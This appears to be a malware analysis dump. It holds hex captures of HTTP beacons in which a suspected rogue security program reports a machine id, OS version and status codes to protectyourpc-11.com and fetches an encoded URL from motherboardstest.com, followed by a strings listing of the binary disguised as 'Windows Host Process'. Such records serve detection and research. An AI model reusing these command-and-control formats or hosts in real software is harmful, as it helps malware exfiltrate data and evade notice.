0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a26 69643d43 30353939   /html>.&id=C0599
0x000001a0 (00416)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x000001b0 (00432)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x000001c0 (00448)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x000001d0 (00464)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x000001e0 (00480)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000001f0 (00496)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000200 (00512)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000210 (00528)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000220 (00544)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x00000230 (00560)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000240 (00576)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000250 (00592)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000260 (00608)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000270 (00624)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000280 (00640)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427659 6930656a 62777667 53393137   fBvYi0ejbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 206d6f74 68657262 6f617264   ost: motherboard
0x00000080 (00128)   73746573 742e636f 6d0d0a41 63636570   stest.com..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000a0 (00160)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a26 69643d43 30353939   /html>.&id=C0599
0x000001a0 (00416)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x000001b0 (00432)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x000001c0 (00448)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x000001d0 (00464)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x000001e0 (00480)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000001f0 (00496)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000200 (00512)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000210 (00528)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000220 (00544)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x00000230 (00560)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000240 (00576)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000250 (00592)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000260 (00608)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000270 (00624)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000280 (00640)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 0d0a0d0a 73207365   lose........s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a26 69643d43 30353939   /html>.&id=C0599
0x000001a0 (00416)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x000001b0 (00432)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x000001c0 (00448)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x000001d0 (00464)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x000001e0 (00480)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000001f0 (00496)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000200 (00512)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000210 (00528)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000220 (00544)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x00000230 (00560)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000240 (00576)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000250 (00592)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000260 (00608)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000270 (00624)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000280 (00640)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   35266e3d 30266578 7472613d 30204854   5&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a65 6374790a            /html>.ecty.


Strings
.
.
040904b0
1285
B&reak
C&ompile
&Data
FileDescription
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
}}*+(	
4tfXEX
59$XNFXZ
%5=%wa
6:6NeXQ
;6gXHv
6=hN@h
/7iJEXWfXS
	7Y/J#
9_fXDX
9>fXGXM
9H(1_ 
9J]gX&X
9U(hhY@
AdjustWindowRectEx
ADVAPI32.dll
AmT0Nh
AppendMenuW
BeginPaint
CallNextHookEx
CallWindowProcW
cc7'H7DXX
cc!ccL}
cc(FXx[
CharNextW
CharUpperW
CheckMenuItem
ClientToScreen
CloseHandle
ClosePrinter
CLSIDFromProgID
CLSIDFromString
c>N_$XC
CoFreeUnusedLibraries
CoGetClassObject
COMCTL32.dll
COMDLG32.dll
CompareStringA
CompareStringW
ConvertDefaultLocale
CopyAcceleratorTableW
CopyRect
CoRegisterMessageFilter
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CreateBitmap
CreateDialogIndirectParamW
CreateFileA
CreateFileW
CreateILockBytesOnHGlobal
CreateMutexW
CreateProcessW
CreateRectRgnIndirect
CreateWindowExW
c'YcgXT
@.data
DefWindowProcW
DeleteCriticalSection
DeleteDC
DeleteObject
DestroyMenu
DestroyWindow
DispatchMessageW
DocumentPropertiesW
DrawIcon
DrawTextExW
DrawTextW
DuplicateHandle
dXeXEX;
DXh6/a
[DXh.a
DXo\-S
.dX&X%Xk
dXx'Xr
dYc=&XYM:
eGwd/7
$ehVR@
EnableMenuItem
EnableWindow
EndDialog
EndPaint
EnterCriticalSection
EnumResourceLanguagesA
EnumResourceLanguagesW
EqualRect
Escape
eX+)6`
EX9	\ 
eXEXvojI
eXgX&Xb
ExitProcess
eXk%X?
ExpandEnvironmentStringsW
ExtSelectClipRgn
ExtTextOutW
eXUFX@
~eX\Xq
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileW
FindResourceW
FindVolumeClose
FlushFileBuffers
FormatMessageW
FreeEnvironmentStringsW
FreeLibrary
FreeResource
f|-SU{
-;[fX!
\fX}|fX
FXfXLc
fX>{m)
FXt8&X
fX$XOJ-Hk
FX'X}R
#{.$[Fy9
gA`&~m
GDI32.dll
gecwkjR6
GetACP
GetActiveWindow
GetBkColor
GetCapture
GetClassInfoExW
GetClassInfoW
GetClassLongW
GetClassNameW
GetClientRect
GetClipBox
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStringsW
GetFileAttributesW
GetFileSize
GetFileSizeEx
GetFileTime
GetFileTitleW
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameW
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocaleInfoW
GetMapMode
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessagePos
GetMessageTime
GetMessageW
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleW
GetNextDlgGroupItem
GetNextDlgTabItem
GetObjectW
GetOEMCP
GetParent
>GetPh
GetPrivateProfileStringW
GetProcAddress
GetPropW
GetRgnBox
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemInfo
GetSystemMenu
GetSystemMetrics
GetSystemTimeAsFileTime
GetTextColor
GetThreadLocale
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetUserDefaultUILanguage
GetVersionExA
GetVersionExW
GetViewportExtEx
GetVolumeInformationW
GetWindow
GetWindowDC
GetWindowExtEx
GetWindowLongW
GetWindowPlacement
GetWindowRect
GetWindowTextW
GetWindowThreadProcessId
!'G'gF
GIM8B!
GlobalAddAtomW
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomW
GlobalFlags
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
GrayStringW
gX6;(\
gXDX<R
GX]gXhGX
gX(W-J
gX$X'X
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HEXeX1
[hhLoca
hLibrh
hQhrO@
HVFX/.
hx$Xw{s
InitCommonControlsEx
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IntersectRect
InvalidateRect
InvalidateRgn
,IScDX
IsChild
IsDebuggerPresent
IsDialogMessageW
IsIconic
IsRectEmpty
IsValidCodePage
IsWindow
IsWindowEnabled
IsWindowVisible
I'X='X$X
(j,4hhSlee
~jfXeX
J#qZ[Ha@
K{|D;b
KERNEL32.dll
k.}eX@
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadBitmapW
LoadCursorW
LoadIconW
LoadLibraryA
LoadLibraryW
LoadResource
LocalAlloc
LocalFree
LocalReAlloc
LockFile
LockResource
lstrcmpA
lstrcmpW
lstrlenA
lstrlenW
	l'XM+,
l]YgXr
L/[zeX
m6GX/fXDX
MapDialogRect
MapWindowPoints
MessageBeep
MessageBoxW
mGXGX>
m<^laY
ModifyMenuW
MoveWindow
MulDiv
MultiByteToWideChar
)mVB?~
M" XgA
>M)'Xv%X2
n_FXdXj
n%GR1Gf
NNuc_P
nn)v?1
N$XI},
O9XJX"
odX9(h
OffsetRect
OffsetViewportOrgEx
ole32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OleUIBusyW
OleUninitialize
OpenPrinterW
PathFindExtensionW
PathFindFileNameW
PathIsUNCW
PathStripToRootW
PeekMessageW
PostMessageW
PostQuitMessage
PostThreadMessageW
PtInRect
PtVisible
\PVL36
q1VKGjx
;q7yPD
QueryPerformanceCounter
RaiseException
`.rdata
ReadFile
RectVisible
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegDeleteKeyW
RegEnumKeyW
RegisterClassW
RegisterClipboardFormatW
RegisterWindowMessageW
RegOpenKeyExW
RegOpenKeyW
RegQueryValueExW
RegQueryValueW
ReleaseCapture
ReleaseDC
ReleaseMutex
RemovePropW
RestoreDC
rf+#'Y
RtlUnwind
$rx.JB
SaveDC
ScaleViewportExtEx
ScaleWindowExtEx
SelectObject
SendDlgItemMessageA
SendDlgItemMessageW
SendMessageW
SetActiveWindow
SetBkColor
SetCapture
SetCurrentDirectoryW
SetCursor
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
SetPropW
SetRect
SetStdHandle
SetTextColor
SetTimer
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowContextHelpId
SetWindowExtEx
SetWindowLongW
SetWindowPos
SetWindowsHookExW
SetWindowTextW
SHLWAPI.dll
ShowWindow
SizeofResource
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
SystemParametersInfoA
TabbedTextOutW
TerminateProcess
TextOutW
tFX_gX
!This program cannot be run in DOS mode.
ThlAllh
ThLocah
TId=cN
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
TTh<a@
"t}u&:#
	*Tz~&}Pw
UDX5TeX>
uEXgXA
UnhandledExceptionFilter
UnhookWindowsHookEx
UnlockFile
UnregisterClassW
	UN&Xv'X
UOFXj!
UpdateWindow
USER32.dll
uun5$XR
u,&yQ'
ValidateRect
+~VDX3
VdXDX~8
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
w3|nbey
WaitForSingleObject
wgXFX1
WideCharToMultiByte
WinHelpW
WINSPOOL.DRV
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringW
=WS-'d
X_4;%X
X5^gX\
$X5&X{ 
X5\YOX
$X6%X,&X;
X7FX/,
X7yK-|
X:9EX%X
X9li%X
X9	xgX
%XdX(0
XDXEX\
XDXH+&XY2
XdXIJy8
&XdX$X
X/eX8%X
X{eX>jy
XfX|\>
XFX4Xv4
XfX-dX
XfXDX#
X}FXdX
&XFXgXhU
XfXGXI4
'X[FXH
XfX^ldX^kQ
~$XfX&X
XGX9&X
X-gXDXn
XgX-kS
XgXM]K
XGXnO!
XgXu.dX`
X{~h^;
XhdXfXV
XhFXFX
xiFXha
(;%XiJ
]	'XJ7
XJFXGX
Xk,^5EX
XKlYU)k
&Xl7)nQ
XL_t;;
}$XmdXJ9]
X*O\Ll
XO}Y~%Xu
%X(tDX
XTOgXP
'Xt&Xw
XudXl-
XUGXfX
XU*V]B
XU$XdX?
X\vfXq
XVwY^EX
XWGX[|~
XW:T	`
X,;$X\
X'X4	|DX
&X&X6DX
X(%X9?
XXEXFXS
X%XfXk=}
&X+&XNZFX
X$X%XR
X$Xy:(
XyY*nc
Y>[eXB
yEX'X3
YgXnDX
>=YoccLy-
}]YoGX
y{TGXK
YUW~fX
{y*X/-|
yy&XgX
ZEXDX?
z/gXeX
/zU^fXH
^Zx5jQ